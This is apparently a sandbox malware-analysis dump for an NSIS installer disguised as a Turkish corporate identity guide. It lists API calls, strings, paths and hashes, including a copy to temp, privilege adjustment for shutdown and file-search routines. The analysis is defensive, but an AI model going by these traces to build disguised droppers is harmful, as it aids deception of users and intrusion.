4675->4678 4676 6f3d2656 GlobalFree 4676->4678 4677 6f3d268b GlobalFree 4677->4584 4678->4672 4678->4673 4678->4674 4678->4675 4678->4676 4678->4677 4679 6f3d1272 2 API calls 4678->4679 4725 6f3d12e1 4678->4725 4679->4678 4729 6f3d121b GlobalAlloc 4681->4729 4683 6f3d15b9 4684 6f3d15c6 2 API calls 4683->4684 4685 6f3d15c3 4684->4685 4686 6f3d1272 4685->4686 4687 6f3d127b GlobalAlloc lstrcpynW 4686->4687 4688 6f3d12b5 GlobalFree 4686->4688 4687->4688 4688->4594 4690 6f3d15ff lstrcpyW 4689->4690 4691 6f3d15d2 wsprintfW 4689->4691 4694 6f3d1618 4690->4694 4691->4694 4694->4597 4696 6f3d1891 4695->4696 4697 6f3d253a 4695->4697 4696->4604 4696->4605 4697->4696 4698 6f3d2556 GlobalFree 4697->4698 4698->4697 4700 6f3d1272 2 API calls 4699->4700 4701 6f3d155e 4700->4701 4701->4599 4702->4609 4703->4636 4705 6f3d15ad 4704->4705 4705->4632 4712 6f3d121b GlobalAlloc 4706->4712 4708 6f3d123b lstrcpynW 4708->4627 4709->4640 4710->4628 4711->4635 4712->4708 4714 6f3d12c1 4713->4714 4715 6f3d122c 2 API calls 4714->4715 4716 6f3d12df 4715->4716 4716->4643 4718 6f3d271c 4717->4718 4719 6f3d26c6 VirtualAlloc 4717->4719 4718->4650 4719->4718 4721 6f3d2a61 4720->4721 4722 6f3d2a66 GetLastError 4721->4722 4723 6f3d2a71 4721->4723 4722->4723 4723->4656 4724->4678 4726 6f3d130c 4725->4726 4727 6f3d12ea 4725->4727 4726->4678 4727->4726 4728 6f3d12f0 lstrcpyW 4727->4728 4728->4726 4729->4683 5587 402a35 5588 402c1f 17 API calls 5587->5588 5589 402a3b 5588->5589 5590 402a72 5589->5590 5591 40288b 5589->5591 5593 402a4d 5589->5593 5590->5591 5592 4062dc 17 API calls 5590->5592 5592->5591 5593->5591 5595 406201 wsprintfW 5593->5595 5595->5591 5596 401735 5597 402c41 17 API calls 5596->5597 5598 40173c SearchPathW 5597->5598 5599 4029e6 5598->5599 5600 401757 5598->5600 5600->5599 5602 4062ba lstrcpynW 5600->5602 5602->5599 5603 4014b8 5604 4014be 5603->5604 5605 401389 2 API calls 5604->5605 5606 4014c6 5605->5606 5607 401db9 GetDC 5608 402c1f 17 API calls 5607->5608 5609 401dcb GetDeviceCaps 
MulDiv ReleaseDC 5608->5609 5610 402c1f 17 API calls 5609->5610 5611 401dfc 5610->5611 5612 4062dc 17 API calls 5611->5612 5613 401e39 CreateFontIndirectW 5612->5613 5614 402592 5613->5614 5615 40283b 5616 402843 5615->5616 5617 402847 FindNextFileW 5616->5617 5618 402859 5616->5618 5617->5618 5619 4029e6 5618->5619 5621 4062ba lstrcpynW 5618->5621 5621->5619

Control-flow Graph (entry block 40338f-4033cc: SetErrorMode, GetVersion)
APIs
• SetErrorMode.KERNELBASE ref: 004033B2
• GetVersion.KERNEL32 ref: 004033B8
• lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004033EB
• #17.COMCTL32(?,00000006,00000008,0000000A), ref: 00403428
• OleInitialize.OLE32(00000000), ref: 0040342F
• SHGetFileInfoW.SHELL32(0042B208,00000000,?,000002B4,00000000), ref: 0040344B
• GetCommandLineW.KERNEL32(Fjernbetjeningsenhedernes Setup,NSIS Error,?,00000006,00000008,0000000A), ref: 00403460
• CharNextW.USER32(00000000,"C:\Users\user\Desktop\DHRI_kurumsal kimlik rehberi-2023.exe",00000020,"C:\Users\user\Desktop\DHRI_kurumsal kimlik rehberi-2023.exe",00000000,?,00000006,00000008,0000000A), ref: 00403498
  • Part of subcall function 00406694: GetModuleHandleA.KERNEL32(?,00000020,?,00403401,0000000A), ref: 004066A6
  • Part of subcall function 00406694: GetProcAddress.KERNEL32(00000000,?), ref: 004066C1
• GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 004035D2
• GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 004035E3
• lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004035EF
• GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 00403603
• lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 0040360B
• SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 0040361C
• SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403624
• DeleteFileW.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 00403638
  • Part of subcall function 004062BA: lstrcpynW.KERNEL32(?,?,00000400,00403460,Fjernbetjeningsenhedernes Setup,NSIS Error,?,00000006,00000008,0000000A), ref: 004062C7
• OleUninitialize.OLE32(00000006,?,00000006,00000008,0000000A), ref: 00403703
• ExitProcess.KERNEL32 ref: 00403724
                                                                                                                                                                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 00403737
                                                                                                                                                                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C), ref: 00403746
                                                                                                                                                                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 00403751
                                                                                                                                                                                          • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\DHRI_kurumsal kimlik rehberi-2023.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 0040375D
                                                                                                                                                                                          • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403779
                                                                                                                                                                                          • DeleteFileW.KERNEL32(0042AA08,0042AA08,?,00435000,00000008,?,00000006,00000008,0000000A), ref: 004037D3
                                                                                                                                                                                          • CopyFileW.KERNEL32(C:\Users\user\Desktop\DHRI_kurumsal kimlik rehberi-2023.exe,0042AA08,00000001,?,00000006,00000008,0000000A), ref: 004037E7
                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,0042AA08,0042AA08,?,0042AA08,00000000,?,00000006,00000008,0000000A), ref: 00403814
                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 00403843
                                                                                                                                                                                          • OpenProcessToken.ADVAPI32(00000000), ref: 0040384A
                                                                                                                                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0040385F
                                                                                                                                                                                          • AdjustTokenPrivileges.ADVAPI32 ref: 00403882
                                                                                                                                                                                          • ExitWindowsEx.USER32(00000002,80040002), ref: 004038A7
                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 004038CA
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000004.00000002.35513408646.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000004.00000002.35513376796.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                          • Associated: 00000004.00000002.35513440436.0000000000408000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000040A000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.0000000000431000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.0000000000437000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000043A000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000043F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000047C000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                          • Associated: 00000004.00000002.35513694837.000000000047F000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_DHRI_kurumsal kimlik rehberi-2023.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: lstrcat$FileProcess$Exit$CurrentDeleteDirectoryEnvironmentHandlePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeModuleNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                                                                                                                                                          • String ID: "C:\Users\user\Desktop\DHRI_kurumsal kimlik rehberi-2023.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\perula$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\perula\Thaumaturgical146$C:\Users\user\Desktop$C:\Users\user\Desktop\DHRI_kurumsal kimlik rehberi-2023.exe$Error launching installer$Fjernbetjeningsenhedernes Setup$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                                                                                                                                          • API String ID: 3441113951-3960451553
                                                                                                                                                                                          • Opcode ID: c69f0a08dcb2e1d024cd1a682ba050e32cb95b0861efa09548cea5cd73a41d6c
                                                                                                                                                                                          • Instruction ID: 34b402965a056e7880f406cddf034ee68ffb155d70387f36a3cc73b0da0a8952
                                                                                                                                                                                          • Opcode Fuzzy Hash: c69f0a08dcb2e1d024cd1a682ba050e32cb95b0861efa09548cea5cd73a41d6c
                                                                                                                                                                                          • Instruction Fuzzy Hash: FBD11571500310ABE720BF659D45B2B3AACEB4074AF10447FF881B62E1DBBD9E45876E
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetDlgItem.USER32(?,000003F9), ref: 00404CB6
                                                                                                                                                                                          • GetDlgItem.USER32(?,00000408), ref: 00404CC1
                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 00404D0B
                                                                                                                                                                                          • LoadBitmapW.USER32(0000006E), ref: 00404D1E
                                                                                                                                                                                          • SetWindowLongW.USER32(?,000000FC,00405296), ref: 00404D37
                                                                                                                                                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404D4B
                                                                                                                                                                                          • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404D5D
                                                                                                                                                                                          • SendMessageW.USER32(?,00001109,00000002), ref: 00404D73
                                                                                                                                                                                          • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404D7F
                                                                                                                                                                                          • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404D91
                                                                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 00404D94
                                                                                                                                                                                          • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404DBF
                                                                                                                                                                                          • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404DCB
                                                                                                                                                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E61
                                                                                                                                                                                          • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404E8C
                                                                                                                                                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404EA0
                                                                                                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00404ECF
                                                                                                                                                                                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404EDD
                                                                                                                                                                                          • ShowWindow.USER32(?,00000005), ref: 00404EEE
                                                                                                                                                                                          • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404FEB
                                                                                                                                                                                          • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00405050
                                                                                                                                                                                          • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405065
                                                                                                                                                                                          • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405089
                                                                                                                                                                                          • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004050A9
                                                                                                                                                                                          • ImageList_Destroy.COMCTL32(?), ref: 004050BE
                                                                                                                                                                                          • GlobalFree.KERNEL32(?), ref: 004050CE
                                                                                                                                                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405147
                                                                                                                                                                                          • SendMessageW.USER32(?,00001102,?,?), ref: 004051F0
                                                                                                                                                                                          • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004051FF
                                                                                                                                                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 0040521F
                                                                                                                                                                                          • ShowWindow.USER32(?,00000000), ref: 0040526D
                                                                                                                                                                                          • GetDlgItem.USER32(?,000003FE), ref: 00405278
                                                                                                                                                                                          • ShowWindow.USER32(00000000), ref: 0040527F
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000004.00000002.35513408646.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000004.00000002.35513376796.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                          • Associated: 00000004.00000002.35513440436.0000000000408000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000040A000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.0000000000431000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.0000000000437000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000043A000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000043F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000047C000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                          • Associated: 00000004.00000002.35513694837.000000000047F000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_DHRI_kurumsal kimlik rehberi-2023.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                                                                          • String ID: $M$N
                                                                                                                                                                                          • API String ID: 1638840714-813528018
                                                                                                                                                                                          • Opcode ID: d7fb2f4892de50fbc14c1a930a22a2945486bdf273952240de52388985094c93
                                                                                                                                                                                          • Instruction ID: f888d98cc81d7f01a919363da6f821789f230268a52e2f70c0503caf05bd5b25
                                                                                                                                                                                          • Opcode Fuzzy Hash: d7fb2f4892de50fbc14c1a930a22a2945486bdf273952240de52388985094c93
                                                                                                                                                                                          • Instruction Fuzzy Hash: BB026FB0900209EFDB109FA4DD85AAE7BB5FB84314F14857AF610BA2E0C7799D52CF58
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 6F3D121B: GlobalAlloc.KERNELBASE(00000040,?,6F3D123B,?,6F3D12DF,00000019,6F3D11BE,-000000A0), ref: 6F3D1225
                                                                                                                                                                                          • GlobalAlloc.KERNELBASE(00000040,00001CA4), ref: 6F3D1C6B
                                                                                                                                                                                          • lstrcpyW.KERNEL32(00000008,?), ref: 6F3D1CB3
                                                                                                                                                                                          • lstrcpyW.KERNEL32(00000808,?), ref: 6F3D1CBD
                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 6F3D1CD0
                                                                                                                                                                                          • GlobalFree.KERNEL32(?), ref: 6F3D1DB2
                                                                                                                                                                                          • GlobalFree.KERNEL32(?), ref: 6F3D1DB7
                                                                                                                                                                                          • GlobalFree.KERNEL32(?), ref: 6F3D1DBC
                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 6F3D1FA6
                                                                                                                                                                                          • lstrcpyW.KERNEL32(?,?), ref: 6F3D2140
                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000008), ref: 6F3D21B5
                                                                                                                                                                                          • LoadLibraryW.KERNEL32(00000008), ref: 6F3D21C6
                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 6F3D2220
                                                                                                                                                                                          • lstrlenW.KERNEL32(00000808), ref: 6F3D223A
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000004.00000002.35537090100.000000006F3D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F3D0000, based on PE: true
• Associated: 00000004.00000002.35537038422.000000006F3D0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000004.00000002.35537142179.000000006F3D4000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000004.00000002.35537193155.000000006F3D6000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_6f3d0000_DHRI_kurumsal kimlik rehberi-2023.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 245916457-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • DeleteFileW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,76FC3420,00000000), ref: 004059F5
                                                                                                                                                                                          • lstrcatW.KERNEL32(0042F250,\*.*), ref: 00405A3D
                                                                                                                                                                                          • lstrcatW.KERNEL32(?,0040A014), ref: 00405A60
                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?,0040A014,?,0042F250,?,?,C:\Users\user\AppData\Local\Temp\,76FC3420,00000000), ref: 00405A66
                                                                                                                                                                                          • FindFirstFileW.KERNEL32(0042F250,?,?,?,0040A014,?,0042F250,?,?,C:\Users\user\AppData\Local\Temp\,76FC3420,00000000), ref: 00405A76
                                                                                                                                                                                          • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405B16
                                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 00405B25
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • "C:\Users\user\Desktop\DHRI_kurumsal kimlik rehberi-2023.exe", xrefs: 004059CC
                                                                                                                                                                                          • \*.*, xrefs: 00405A37
                                                                                                                                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 004059DA
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000004.00000002.35513408646.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.35513376796.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.35513440436.0000000000408000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.35513472157.000000000040A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.35513472157.0000000000431000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.35513472157.0000000000437000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.35513472157.000000000043A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.35513472157.000000000043F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.35513472157.000000000047C000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.35513694837.000000000047F000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_DHRI_kurumsal kimlik rehberi-2023.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                                                                          • String ID: "C:\Users\user\Desktop\DHRI_kurumsal kimlik rehberi-2023.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                                                                                                                                          • API String ID: 2035342205-2517841759
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • FindFirstFileW.KERNELBASE(?,00430298,0042FA50,00405CE0,0042FA50,0042FA50,00000000,0042FA50,0042FA50,?,?,76FC3420,004059EC,?,C:\Users\user\AppData\Local\Temp\,76FC3420), ref: 00406608
                                                                                                                                                                                          • FindClose.KERNELBASE(00000000), ref: 00406614
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000004.00000002.35513408646.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.35513376796.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.35513440436.0000000000408000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.35513472157.000000000040A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.35513472157.0000000000431000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.35513472157.0000000000437000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.35513472157.000000000043A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.35513472157.000000000043F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.35513472157.000000000047C000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.35513694837.000000000047F000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_DHRI_kurumsal kimlik rehberi-2023.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Find$CloseFileFirst
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2295610775-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403D94
                                                                                                                                                                                          • ShowWindow.USER32(?), ref: 00403DB1
                                                                                                                                                                                          • DestroyWindow.USER32 ref: 00403DC5
                                                                                                                                                                                          • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403DE1
                                                                                                                                                                                          • GetDlgItem.USER32(?,?), ref: 00403E02
                                                                                                                                                                                          • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403E16
                                                                                                                                                                                          • IsWindowEnabled.USER32(00000000), ref: 00403E1D
                                                                                                                                                                                          • GetDlgItem.USER32(?,00000001), ref: 00403ECB
                                                                                                                                                                                          • GetDlgItem.USER32(?,00000002), ref: 00403ED5
                                                                                                                                                                                          • SetClassLongW.USER32(?,000000F2,?), ref: 00403EEF
                                                                                                                                                                                          • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403F40
                                                                                                                                                                                          • GetDlgItem.USER32(?,00000003), ref: 00403FE6
                                                                                                                                                                                          • ShowWindow.USER32(00000000,?), ref: 00404007
                                                                                                                                                                                          • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00404019
                                                                                                                                                                                          • EnableWindow.USER32(?,?), ref: 00404034
                                                                                                                                                                                          • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040404A
                                                                                                                                                                                          • EnableMenuItem.USER32(00000000), ref: 00404051
                                                                                                                                                                                          • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00404069
                                                                                                                                                                                          • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040407C
                                                                                                                                                                                          • lstrlenW.KERNEL32(0042D248,?,0042D248,00000000), ref: 004040A6
                                                                                                                                                                                          • SetWindowTextW.USER32(?,0042D248), ref: 004040BA
                                                                                                                                                                                          • ShowWindow.USER32(?,0000000A), ref: 004041EE
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000004.00000002.35513408646.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3282139019-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00406694: GetModuleHandleA.KERNEL32(?,00000020,?,00403401,0000000A), ref: 004066A6
                                                                                                                                                                                            • Part of subcall function 00406694: GetProcAddress.KERNEL32(00000000,?), ref: 004066C1
                                                                                                                                                                                          • lstrcatW.KERNEL32(1033,0042D248), ref: 00403A2B
                                                                                                                                                                                          • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\perula,1033,0042D248,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D248,00000000,00000002,C:\Users\user\AppData\Local\Temp\), ref: 00403AAB
                                                                                                                                                                                          • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\perula,1033,0042D248,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D248,00000000), ref: 00403ABE
                                                                                                                                                                                          • GetFileAttributesW.KERNEL32(Call), ref: 00403AC9
                                                                                                                                                                                          • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\perula), ref: 00403B12
                                                                                                                                                                                            • Part of subcall function 00406201: wsprintfW.USER32 ref: 0040620E
                                                                                                                                                                                          • RegisterClassW.USER32(00433E80), ref: 00403B4F
                                                                                                                                                                                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403B67
                                                                                                                                                                                          • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403B9C
                                                                                                                                                                                          • ShowWindow.USER32(00000005,00000000), ref: 00403BD2
                                                                                                                                                                                          • GetClassInfoW.USER32(00000000,RichEdit20W,00433E80), ref: 00403BFE
                                                                                                                                                                                          • GetClassInfoW.USER32(00000000,RichEdit,00433E80), ref: 00403C0B
                                                                                                                                                                                          • RegisterClassW.USER32(00433E80), ref: 00403C14
                                                                                                                                                                                          • DialogBoxParamW.USER32(?,00000000,00403D58,00000000), ref: 00403C33
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000004.00000002.35513408646.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                          • String ID: "C:\Users\user\Desktop\DHRI_kurumsal kimlik rehberi-2023.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\perula$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                                                                                                                          • API String ID: 1975747703-2054314548
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 00402EEE
                                                                                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\DHRI_kurumsal kimlik rehberi-2023.exe,00000400,?,00000006,00000008,0000000A), ref: 00402F0A
                                                                                                                                                                                            • Part of subcall function 00405DB0: GetFileAttributesW.KERNELBASE(?,00402F1D,C:\Users\user\Desktop\DHRI_kurumsal kimlik rehberi-2023.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405DB4
                                                                                                                                                                                            • Part of subcall function 00405DB0: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DD6
                                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,00443000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\DHRI_kurumsal kimlik rehberi-2023.exe,C:\Users\user\Desktop\DHRI_kurumsal kimlik rehberi-2023.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00402F56
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000004.00000002.35513408646.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$AttributesCountCreateModuleNameSizeTick
